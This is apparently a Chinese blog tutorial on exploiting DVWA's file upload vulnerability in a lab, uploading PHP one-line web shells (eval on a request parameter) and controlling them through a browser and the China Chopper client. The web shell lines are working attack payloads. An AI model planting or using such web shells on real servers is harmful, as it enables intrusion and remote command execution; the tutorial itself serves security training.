Web安全_檔案上傳漏洞_DVWA上傳shell+中國菜刀管理檔案
阿新 • • 發佈:2018-11-23
遠端登陸靶機:
- 開啟kali命令列
- ssh 賬號@地址
- 輸入密碼
- 成功連線
這時就可以輸入命令對靶機進行操作,如檢視、刪除檔案、進入目錄等等
如這裡進入靶機裡DVWA上傳檔案目錄處檢視所上傳的檔案:
可以檢視到有四個檔案,可以進行刪除(這裡刪除php字尾的檔案,防止對之後的實驗干擾)使用rm 檔案
命令
1、上傳一句話木馬
一句話木馬主要為系統函式,php主要為eval、system、shell_exec、assert函式等
eval函式可分為兩種
- 在瀏覽器進行操作
<?php eval($_REQUEST['cmd']);?>
cmd為引數名可以更換其他名字
- 在客戶端軟體(如中國菜刀)進行操作
<?php eval($_POST[pass]);?>
pass為密碼,為我們客戶端登陸到後臺的密碼
2.1瀏覽器操作後臺
- 提前先準備好一個一句話木馬檔案shell.php,內容為
<?php eval($_REQUEST['cmd']);?>
- 然後開啟DVWA檔案上傳的頁面對此木馬進行上傳
然後將檔案路徑複製到位址列中將#覆蓋,末尾加?cmd=xxx;
此時可以對cmd進行傳參,如cmd=phpinfo();
末尾需要記得加分號
2.2客戶端操作後臺
- 準備好一句話木馬檔案chopper.php,內容為
<?php eval($_POST[abc]);?>
我這裡將密碼改為了abc - 然後上傳到靶機上,環境為windows7(中國菜刀執行在windows系統下)
- 上傳好檔案之後,開啟中國菜刀,右鍵選擇新增按照如圖進行配置,配置好點選新增
- 新增好了之後,列表中就會有我們剛新增的shell
- 右鍵進行選擇,可以進行諸如檔案管理,資料庫管理等等操作
可以看到第一次上傳的shell.php和第二次上傳的chopper.php
歡迎關注我的微信公眾號,後臺回覆“菜刀”即可獲得中國菜刀資源